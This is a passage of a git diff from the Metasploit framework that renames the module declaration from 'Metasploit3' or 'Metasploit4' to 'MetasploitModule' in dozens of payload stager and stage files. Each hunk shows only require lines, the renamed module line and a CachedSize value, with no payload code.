b/modules/payloads/stagers/osx/x86/reverse_tcp.rb index 1c2d8d4e69..27dcd36cf6 100644 --- a/modules/payloads/stagers/osx/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/osx/x86/reverse_tcp.rb @@ -14,7 +14,7 @@ require 'msf/core/handler/reverse_tcp' # Mac OS X x86 Reverse TCP stager. # ### -module Metasploit3 +module MetasploitModule CachedSize = 123 diff --git a/modules/payloads/stagers/php/bind_tcp.rb b/modules/payloads/stagers/php/bind_tcp.rb index f2167c7690..5c283da8a5 100644 --- a/modules/payloads/stagers/php/bind_tcp.rb +++ b/modules/payloads/stagers/php/bind_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/php/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 1188 diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6.rb b/modules/payloads/stagers/php/bind_tcp_ipv6.rb index f8d16bb8de..6ebec08930 100644 --- a/modules/payloads/stagers/php/bind_tcp_ipv6.rb +++ b/modules/payloads/stagers/php/bind_tcp_ipv6.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/php/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 1187 diff --git a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb index bf90de7e90..a01609fac8 100644 --- a/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb +++ b/modules/payloads/stagers/php/bind_tcp_ipv6_uuid.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/php/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 1361 diff --git a/modules/payloads/stagers/php/bind_tcp_uuid.rb b/modules/payloads/stagers/php/bind_tcp_uuid.rb index 1f8397b4d1..8a7e263464 100644 --- a/modules/payloads/stagers/php/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/php/bind_tcp_uuid.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/php/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 1362 diff --git a/modules/payloads/stagers/php/reverse_tcp.rb b/modules/payloads/stagers/php/reverse_tcp.rb index 9768010ca5..ffd8f880d7 100644 --- a/modules/payloads/stagers/php/reverse_tcp.rb +++ b/modules/payloads/stagers/php/reverse_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/php/reverse_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 951 diff --git a/modules/payloads/stagers/php/reverse_tcp_uuid.rb b/modules/payloads/stagers/php/reverse_tcp_uuid.rb index e99e44664a..22d28fa075 100644 --- a/modules/payloads/stagers/php/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/php/reverse_tcp_uuid.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/php/reverse_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 1125 diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb index 113f9b4828..41c763ad2c 100644 --- a/modules/payloads/stagers/python/bind_tcp.rb +++ b/modules/payloads/stagers/python/bind_tcp.rb @@ -10,7 +10,7 @@ require 'msf/core/payload/python/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 386 diff --git a/modules/payloads/stagers/python/bind_tcp_uuid.rb b/modules/payloads/stagers/python/bind_tcp_uuid.rb index ec327de75f..88c071564f 100644 --- a/modules/payloads/stagers/python/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/python/bind_tcp_uuid.rb @@ -10,7 +10,7 @@ require 'msf/core/payload/python/bind_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 486 diff --git a/modules/payloads/stagers/python/reverse_http.rb b/modules/payloads/stagers/python/reverse_http.rb index 97874d9e5c..59edabedbe 100644 --- a/modules/payloads/stagers/python/reverse_http.rb +++ b/modules/payloads/stagers/python/reverse_http.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_http' require 'msf/core/payload/python' require 'msf/core/payload/python/reverse_http' -module Metasploit4 +module MetasploitModule CachedSize = 494 diff --git a/modules/payloads/stagers/python/reverse_https.rb b/modules/payloads/stagers/python/reverse_https.rb index bad7e55fea..7e94c41234 100644 --- a/modules/payloads/stagers/python/reverse_https.rb +++ b/modules/payloads/stagers/python/reverse_https.rb @@ -8,7 +8,7 @@ require 'msf/core/handler/reverse_https' require 'msf/core/payload/python' require 'msf/core/payload/python/reverse_http' -module Metasploit4 +module MetasploitModule CachedSize = 762 diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb index 7350a20022..367b3c8693 100644 --- a/modules/payloads/stagers/python/reverse_tcp.rb +++ b/modules/payloads/stagers/python/reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/payload/python/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 362 diff --git a/modules/payloads/stagers/python/reverse_tcp_uuid.rb b/modules/payloads/stagers/python/reverse_tcp_uuid.rb index 80b038fdc4..55d36cde14 100644 --- a/modules/payloads/stagers/python/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/python/reverse_tcp_uuid.rb @@ -9,7 +9,7 @@ require 'msf/core/payload/python/reverse_tcp' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit4 +module MetasploitModule CachedSize = 466 diff --git a/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb b/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb index 2f3d44d3ce..93c6296129 100644 --- a/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb +++ b/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 359 diff --git a/modules/payloads/stagers/windows/bind_hidden_tcp.rb b/modules/payloads/stagers/windows/bind_hidden_tcp.rb index 8c1bc33ccc..d8586a924c 100644 --- a/modules/payloads/stagers/windows/bind_hidden_tcp.rb +++ b/modules/payloads/stagers/windows/bind_hidden_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 343 diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb index 10aeea1af4..ad3e3bc080 100644 --- a/modules/payloads/stagers/windows/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/bind_ipv6_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 285 diff --git a/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb index 955625dd12..f7f5cf65f7 100644 --- a/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 318 diff --git a/modules/payloads/stagers/windows/bind_nonx_tcp.rb b/modules/payloads/stagers/windows/bind_nonx_tcp.rb index 0e1bec0085..ee6cf243db 100644 --- a/modules/payloads/stagers/windows/bind_nonx_tcp.rb +++ b/modules/payloads/stagers/windows/bind_nonx_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 201 diff --git a/modules/payloads/stagers/windows/bind_tcp.rb b/modules/payloads/stagers/windows/bind_tcp.rb index c59304480d..7a37affda9 100644 --- a/modules/payloads/stagers/windows/bind_tcp.rb +++ b/modules/payloads/stagers/windows/bind_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 285 diff --git a/modules/payloads/stagers/windows/bind_tcp_rc4.rb b/modules/payloads/stagers/windows/bind_tcp_rc4.rb index cd50c3b324..e5012d6137 100644 --- a/modules/payloads/stagers/windows/bind_tcp_rc4.rb +++ b/modules/payloads/stagers/windows/bind_tcp_rc4.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 398 diff --git a/modules/payloads/stagers/windows/bind_tcp_uuid.rb b/modules/payloads/stagers/windows/bind_tcp_uuid.rb index bb8326d4f1..1bb216bbc0 100644 --- a/modules/payloads/stagers/windows/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/bind_tcp_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 318 diff --git a/modules/payloads/stagers/windows/findtag_ord.rb b/modules/payloads/stagers/windows/findtag_ord.rb index c6cb7bdd9e..d247665c49 100644 --- a/modules/payloads/stagers/windows/findtag_ord.rb +++ b/modules/payloads/stagers/windows/findtag_ord.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/find_tag' -module Metasploit3 +module MetasploitModule CachedSize = 92 diff --git a/modules/payloads/stagers/windows/reverse_hop_http.rb b/modules/payloads/stagers/windows/reverse_hop_http.rb index 229d85f518..e87918864c 100644 --- a/modules/payloads/stagers/windows/reverse_hop_http.rb +++ b/modules/payloads/stagers/windows/reverse_hop_http.rb @@ -7,7 +7,7 @@ require 'uri' require 'msf/core' require 'msf/core/handler/reverse_hop_http' -module Metasploit3 +module MetasploitModule CachedSize = 353 diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb index 572d1c282d..00f5f71f00 100644 --- a/modules/payloads/stagers/windows/reverse_http.rb +++ b/modules/payloads/stagers/windows/reverse_http.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_http' require 'msf/core/payload/windows/reverse_http' -module Metasploit4 +module MetasploitModule CachedSize = 327 diff --git a/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb b/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb index d6f375b31a..cf7dd5013e 100644 --- a/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb +++ b/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_http' require 'msf/core/payload/uuid/options' -module Metasploit3 +module MetasploitModule CachedSize = 665 diff --git a/modules/payloads/stagers/windows/reverse_https.rb b/modules/payloads/stagers/windows/reverse_https.rb index 0b35881fd0..cecdfc5236 100644 --- a/modules/payloads/stagers/windows/reverse_https.rb +++ b/modules/payloads/stagers/windows/reverse_https.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_https' require 'msf/core/payload/windows/reverse_https' -module Metasploit4 +module MetasploitModule CachedSize = 347 diff --git a/modules/payloads/stagers/windows/reverse_https_proxy.rb b/modules/payloads/stagers/windows/reverse_https_proxy.rb index f9a1e0dbf2..e867e144e6 100644 --- a/modules/payloads/stagers/windows/reverse_https_proxy.rb +++ b/modules/payloads/stagers/windows/reverse_https_proxy.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_https_proxy' -module Metasploit3 +module MetasploitModule CachedSize = 397 diff --git a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb index 0acf1daf15..7ac254aedf 100644 --- a/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 289 diff --git a/modules/payloads/stagers/windows/reverse_nonx_tcp.rb b/modules/payloads/stagers/windows/reverse_nonx_tcp.rb index 6eb08ee213..dc45f124bc 100644 --- a/modules/payloads/stagers/windows/reverse_nonx_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_nonx_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 177 diff --git a/modules/payloads/stagers/windows/reverse_ord_tcp.rb b/modules/payloads/stagers/windows/reverse_ord_tcp.rb index 40efd115c0..8bb52ba25b 100644 --- a/modules/payloads/stagers/windows/reverse_ord_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_ord_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 93 diff --git a/modules/payloads/stagers/windows/reverse_tcp.rb b/modules/payloads/stagers/windows/reverse_tcp.rb index 8fe18aabd6..dd41230c11 100644 --- a/modules/payloads/stagers/windows/reverse_tcp.rb +++ b/modules/payloads/stagers/windows/reverse_tcp.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/windows/reverse_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 281 diff --git a/modules/payloads/stagers/windows/reverse_tcp_allports.rb b/modules/payloads/stagers/windows/reverse_tcp_allports.rb index 27ce0529fa..8a4c884b09 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_allports.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_allports.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp_allports' -module Metasploit3 +module MetasploitModule CachedSize = 282 diff --git a/modules/payloads/stagers/windows/reverse_tcp_dns.rb b/modules/payloads/stagers/windows/reverse_tcp_dns.rb index 2f8af0662e..d987892c39 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_dns.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_dns.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 356 diff --git a/modules/payloads/stagers/windows/reverse_tcp_rc4.rb b/modules/payloads/stagers/windows/reverse_tcp_rc4.rb index 6374045fac..66bc73cf6a 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_rc4.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_rc4.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 394 diff --git a/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb b/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb index 24d29b7e81..d06493861c 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' -module Metasploit3 +module MetasploitModule CachedSize = 469 diff --git a/modules/payloads/stagers/windows/reverse_tcp_uuid.rb b/modules/payloads/stagers/windows/reverse_tcp_uuid.rb index c77c5d056a..b4895a83e6 100644 --- a/modules/payloads/stagers/windows/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/reverse_tcp_uuid.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/windows/reverse_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 314 diff --git a/modules/payloads/stagers/windows/reverse_winhttp.rb b/modules/payloads/stagers/windows/reverse_winhttp.rb index 874c43ba8e..134cac75ad 100644 --- a/modules/payloads/stagers/windows/reverse_winhttp.rb +++ b/modules/payloads/stagers/windows/reverse_winhttp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_http' require 'msf/core/payload/windows/reverse_winhttp' -module Metasploit4 +module MetasploitModule CachedSize = 357 diff --git a/modules/payloads/stagers/windows/reverse_winhttps.rb b/modules/payloads/stagers/windows/reverse_winhttps.rb index 2fc30a16ae..6008bb28d2 100644 --- a/modules/payloads/stagers/windows/reverse_winhttps.rb +++ b/modules/payloads/stagers/windows/reverse_winhttps.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_https' require 'msf/core/payload/windows/reverse_winhttps' -module Metasploit4 +module MetasploitModule CachedSize = 377 diff --git a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb index 58fc21b52a..e1d78ea07e 100644 --- a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb +++ b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/x64/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 485 diff --git a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb index b0db550f7a..d1904d511f 100644 --- a/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/x64/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 526 diff --git a/modules/payloads/stagers/windows/x64/bind_tcp.rb b/modules/payloads/stagers/windows/x64/bind_tcp.rb index 138a5ec914..82e0c9be24 100644 --- a/modules/payloads/stagers/windows/x64/bind_tcp.rb +++ b/modules/payloads/stagers/windows/x64/bind_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/x64/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 483 diff --git a/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb index 03d791ba5f..835504e1a2 100644 --- a/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/bind_tcp' require 'msf/core/payload/windows/x64/bind_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 524 diff --git a/modules/payloads/stagers/windows/x64/reverse_http.rb b/modules/payloads/stagers/windows/x64/reverse_http.rb index 4ae5af6697..4f6e40d6a5 100644 --- a/modules/payloads/stagers/windows/x64/reverse_http.rb +++ b/modules/payloads/stagers/windows/x64/reverse_http.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_http' require 'msf/core/payload/windows/x64/reverse_http' -module Metasploit4 +module MetasploitModule CachedSize = 501 diff --git a/modules/payloads/stagers/windows/x64/reverse_https.rb b/modules/payloads/stagers/windows/x64/reverse_https.rb index 8e5a2fc1f5..a551986762 100644 --- a/modules/payloads/stagers/windows/x64/reverse_https.rb +++ b/modules/payloads/stagers/windows/x64/reverse_https.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_https' require 'msf/core/payload/windows/x64/reverse_https' -module Metasploit4 +module MetasploitModule CachedSize = 532 diff --git a/modules/payloads/stagers/windows/x64/reverse_tcp.rb b/modules/payloads/stagers/windows/x64/reverse_tcp.rb index e2c271e2ed..ce2cee737e 100644 --- a/modules/payloads/stagers/windows/x64/reverse_tcp.rb +++ b/modules/payloads/stagers/windows/x64/reverse_tcp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/windows/x64/reverse_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 449 diff --git a/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb b/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb index 9556fca229..48f58ea558 100644 --- a/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_tcp' require 'msf/core/payload/windows/x64/reverse_tcp' -module Metasploit4 +module MetasploitModule CachedSize = 490 diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb index d87820e334..a0d5afab18 100644 --- a/modules/payloads/stagers/windows/x64/reverse_winhttp.rb +++ b/modules/payloads/stagers/windows/x64/reverse_winhttp.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_http' require 'msf/core/payload/windows/x64/reverse_winhttp' -module Metasploit4 +module MetasploitModule CachedSize = 532 diff --git a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb index 03c844f58b..26d441fcba 100644 --- a/modules/payloads/stagers/windows/x64/reverse_winhttps.rb +++ b/modules/payloads/stagers/windows/x64/reverse_winhttps.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/core/handler/reverse_https' require 'msf/core/payload/windows/x64/reverse_winhttps' -module Metasploit4 +module MetasploitModule CachedSize = 563 diff --git a/modules/payloads/stages/android/meterpreter.rb b/modules/payloads/stages/android/meterpreter.rb index fe89735e12..46164578f3 100644 --- a/modules/payloads/stages/android/meterpreter.rb +++ b/modules/payloads/stages/android/meterpreter.rb @@ -9,7 +9,7 @@ require 'msf/base/sessions/meterpreter_android' require 'msf/base/sessions/meterpreter_options' require 'rex/payloads/meterpreter/config' -module Metasploit4 +module MetasploitModule include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/stages/android/shell.rb b/modules/payloads/stages/android/shell.rb index 5b68d4b419..8f47b6b436 100644 --- a/modules/payloads/stages/android/shell.rb +++ b/modules/payloads/stages/android/shell.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule # The stager should have already included this #include Msf::Payload::Java diff --git a/modules/payloads/stages/bsd/x86/shell.rb b/modules/payloads/stages/bsd/x86/shell.rb index 5c7f5d9337..ef5ae90f85 100644 --- a/modules/payloads/stages/bsd/x86/shell.rb +++ b/modules/payloads/stages/bsd/x86/shell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/bsdi/x86/shell.rb b/modules/payloads/stages/bsdi/x86/shell.rb index 1d18809993..1d0f00bfcb 100644 --- a/modules/payloads/stages/bsdi/x86/shell.rb +++ b/modules/payloads/stages/bsdi/x86/shell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/java/meterpreter.rb b/modules/payloads/stages/java/meterpreter.rb index f0e666349d..050f5ad0c4 100644 --- a/modules/payloads/stages/java/meterpreter.rb +++ b/modules/payloads/stages/java/meterpreter.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_java' require 'msf/base/sessions/meterpreter_options' -module Metasploit4 +module MetasploitModule include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/stages/java/shell.rb b/modules/payloads/stages/java/shell.rb index 16b71199e7..a5803f978a 100644 --- a/modules/payloads/stages/java/shell.rb +++ b/modules/payloads/stages/java/shell.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule # The stager should have already included this #include Msf::Payload::Java diff --git a/modules/payloads/stages/linux/armle/shell.rb b/modules/payloads/stages/linux/armle/shell.rb index d53f725bb0..feffd67cfd 100644 --- a/modules/payloads/stages/linux/armle/shell.rb +++ b/modules/payloads/stages/linux/armle/shell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/linux/mipsbe/shell.rb b/modules/payloads/stages/linux/mipsbe/shell.rb index d6063cdc24..77207e50e1 100644 --- a/modules/payloads/stages/linux/mipsbe/shell.rb +++ b/modules/payloads/stages/linux/mipsbe/shell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Payload::Linux include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/linux/mipsle/shell.rb b/modules/payloads/stages/linux/mipsle/shell.rb index c74c633f36..b81b1c1848 100644 --- a/modules/payloads/stages/linux/mipsle/shell.rb +++ b/modules/payloads/stages/linux/mipsle/shell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Payload::Linux include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/linux/x64/shell.rb b/modules/payloads/stages/linux/x64/shell.rb index caf23a4953..288128f864 100644 --- a/modules/payloads/stages/linux/x64/shell.rb +++ b/modules/payloads/stages/linux/x64/shell.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Payload::Linux include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/linux/x86/meterpreter.rb b/modules/payloads/stages/linux/x86/meterpreter.rb index 6b1a2c0e67..ac4534dfe1 100644 --- a/modules/payloads/stages/linux/x86/meterpreter.rb +++ b/modules/payloads/stages/linux/x86/meterpreter.rb @@ -8,7 +8,7 @@ require 'msf/base/sessions/meterpreter_x86_linux' require 'msf/base/sessions/meterpreter_options' require 'rex/elfparsey' -module Metasploit3 +module MetasploitModule include Msf::Sessions::MeterpreterOptions def initialize(info = {}) diff --git a/modules/payloads/stages/linux/x86/shell.rb b/modules/payloads/stages/linux/x86/shell.rb index 691d5e1fbc..e24fbdbaf7 100644 --- a/modules/payloads/stages/linux/x86/shell.rb +++ b/modules/payloads/stages/linux/x86/shell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Payload::Linux include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/netware/shell.rb b/modules/payloads/stages/netware/shell.rb index 7f7dab8e47..7b89646c4b 100644 --- a/modules/payloads/stages/netware/shell.rb +++ b/modules/payloads/stages/netware/shell.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/osx/armle/execute.rb b/modules/payloads/stages/osx/armle/execute.rb index 3e9bb5a785..61763bd6dc 100644 --- a/modules/payloads/stages/osx/armle/execute.rb +++ b/modules/payloads/stages/osx/armle/execute.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/osx/armle/shell.rb b/modules/payloads/stages/osx/armle/shell.rb index f356a820a8..93b7538385 100644 --- a/modules/payloads/stages/osx/armle/shell.rb +++ b/modules/payloads/stages/osx/armle/shell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/osx/ppc/shell.rb b/modules/payloads/stages/osx/ppc/shell.rb index 2d0b8d7457..56711ae784 100644 --- a/modules/payloads/stages/osx/ppc/shell.rb +++ b/modules/payloads/stages/osx/ppc/shell.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/osx/x64/dupandexecve.rb b/modules/payloads/stages/osx/x64/dupandexecve.rb index cda4f9f07a..33efebef0a 100644 --- a/modules/payloads/stages/osx/x64/dupandexecve.rb +++ b/modules/payloads/stages/osx/x64/dupandexecve.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'msf/base/sessions/command_shell' require 'msf/base/sessions/command_shell_options' -module Metasploit3 +module MetasploitModule include Msf::Sessions::CommandShellOptions diff --git a/modules/payloads/stages/osx/x86/bundleinject.rb b/modules/payloads/stages/osx/x86/bundleinject.rb index 3204ba2a67..4a5650a2ea 100644 --- a/modules/payloads/stages/osx/x86/bundleinject.rb +++ b/modules/payloads/stages/osx/x86/bundleinject.rb @@ -11,7 +11,7 @@ require 'msf/core/payload/osx/bundleinject' # Injects an arbitrary DLL in the exploited process. # ### -module Metasploit3 +module MetasploitModule include Msf::Payload::Osx::BundleInject diff --git 